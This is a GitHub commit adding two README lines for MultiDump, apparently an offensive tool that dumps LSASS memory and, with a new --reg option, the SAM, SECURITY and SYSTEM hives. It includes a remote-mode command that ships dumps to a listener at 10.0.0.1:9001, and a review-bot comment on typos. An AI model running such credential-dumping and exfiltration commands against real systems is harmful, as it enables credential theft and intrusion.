Commit

Update README.md
Xre0uS authored Aug 8, 2024
1 parent 4efe394 commit 972fc30
Showing 1 changed file with 2 additions and 0 deletions.
2 changes: 2 additions & 0 deletions README.md
Expand Up @@ -85,6 +85,8 @@ In remote mode, MultiDump connects to the handler's listener.
MultiDump.exe -r 10.0.0.1:9001
```
In cmd, `--procdump` _must_ be used, or it will fail per [#5](https://github.com/Xre0uS/MultiDump/issues/5), recommend to always use powerhsell if possible.
The key is encrypted with the handler's IP and port. When MultiDump connects through a proxy, the handler should use the `--override-ip` option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump `-r`.
An additional option to dump the `SAM`, `SECURITY` and `SYSTEM` hives are available with `--reg`, the decryption process is the same as LSASS dumps. This is more of a convenience feature to make post exploit information gathering easier.
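Review bot: the sentence about `--procdump` in cmd misspells PowerShell as "powerhsell", joins two statements with a comma, and says "it will fail" without naming what fails, so a reader has to open #5 to learn the symptom. Suggest splitting it into two sentences, for example "In cmd, `--procdump` must be used (see #5). PowerShell is recommended where possible.", and adding a few words on the failure described in the issue. As rendered here the sentence follows the closing code fence directly and runs into the "The key is encrypted" paragraph, so it is worth confirming that it renders as its own paragraph in the README.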